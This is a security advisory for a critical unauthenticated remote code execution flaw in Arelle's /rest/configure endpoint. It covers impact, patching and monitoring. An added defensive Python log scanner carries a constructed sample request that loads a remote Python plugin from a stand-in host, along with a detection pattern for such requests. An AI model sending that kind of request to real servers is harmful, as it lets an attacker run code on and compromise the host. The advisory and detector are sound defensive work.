CVE-2026-42796
Arelle · Arelle
Arelle contains an unauthenticated remote code execution vulnerability in the `/rest/configure` endpoint, allowing attackers to execute malicious Python code via the plugins parameter.
Executive summary
Arelle versions before 2.39.10 are affected by a critical unauthenticated remote code execution vulnerability that allows an attacker to execute arbitrary code with the privileges of the webserver.
Vulnerability
The vulnerability resides in the `/rest/configure` REST endpoint, which performs no authentication or authorization checks. An unauthenticated attacker can supply the URL of a malicious Python file in the `plugins` parameter; the Arelle process then downloads that file as a plugin and executes it.
Business impact
This vulnerability allows for full system compromise, as it enables remote code execution with the permissions of the Arelle process. With a CVSS score of 9.8, the impact includes total loss of confidentiality, integrity, and availability, potentially leading to lateral movement within the network.
Remediation
Immediate Action: Upgrade Arelle to version 2.39.10 or later as a priority; the fix restricts the plugin manager's access and enforces the necessary authentication.
Proactive Monitoring: Review webserver logs for requests to `/rest/configure` whose parameters (in particular `plugins`) contain unusual URLs or values, and monitor for unexpected child processes spawned by the Arelle service.
Compensating Controls: If an immediate update is not feasible, block network access to the `/rest/configure` endpoint with a Web Application Firewall (WAF) or reverse proxy so that unauthorized clients cannot reach it.
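The log review recommended above, as an added example that is not part of this advisory or of Arelle: it parses combined-format access logs (as a reverse proxy in front of Arelle would write them) and flags `/rest/configure` requests whose `plugins` value names a remote URL. It assumes the `plugins` value is a `|`-separated list whose entries may carry a `+`, `-` or `~` prefix (the convention of Arelle's `--plugins` CLI option); the sample log lines are constructed.

```python
"""Flag /rest/configure requests whose plugins parameter loads a remote plugin.

Added example, not Arelle code. Assumes combined-format access logs (as a reverse
proxy in front of Arelle writes them), a '|'-separated plugins value whose entries
may carry a +, - or ~ prefix, and that a remote plugin is an http(s)/ftp URL.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(  # client ident user [time] "METHOD target HTTP/x" status ...
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = {"http", "https", "ftp"}

def remote_plugin_entries(plugins_value):
    """Return the entries of one plugins value that point at a remote URL."""
    remote = []
    for entry in plugins_value.split("|"):
        entry = entry.strip().lstrip("+-~")  # drop add/remove/reload marker (assumed syntax)
        parts = urlsplit(entry)
        if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            remote.append(entry)
    return remote

def flag_suspicious(log_lines):
    """One finding per /rest/configure request that names a remote plugin URL."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        target = urlsplit(m.group("target"))
        if target.path.rstrip("/") != "/rest/configure":
            continue
        params = parse_qs(target.query, keep_blank_values=True)  # decodes %-escapes
        remote = [u for v in params.get("plugins", []) for u in remote_plugin_entries(v)]
        if remote:
            findings.append({"client": m.group("client"), "time": m.group("time"),
                             "status": int(m.group("status")), "plugins": remote})
    return findings

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [12/Mar/2026:10:01:02 +0000] "GET /rest/xbrl/validation?file=r.xbrl HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2026:10:01:09 +0000] "GET /rest/configure?plugins=%2BlocalPlugin HTTP/1.1" 200 77',
    '198.51.100.23 - - [12/Mar/2026:10:02:41 +0000] "GET /rest/configure?plugins=%2Bhttp%3A%2F%2F203.0.113.9%2Fp.py HTTP/1.1" 200 77',
]
if __name__ == "__main__":
    for f in flag_suspicious(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} loaded remote plugin(s): {f['plugins']}")
```

A local plugin name or a request to another endpoint produces no finding; only the third sample line is reported.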
Exploitation status
Public Exploit Available: Not specified
Analyst recommendation
This is a critical RCE vulnerability that requires immediate attention. Organizations running Arelle must update to the patched version as a priority to prevent unauthenticated attackers from gaining full control over the host system.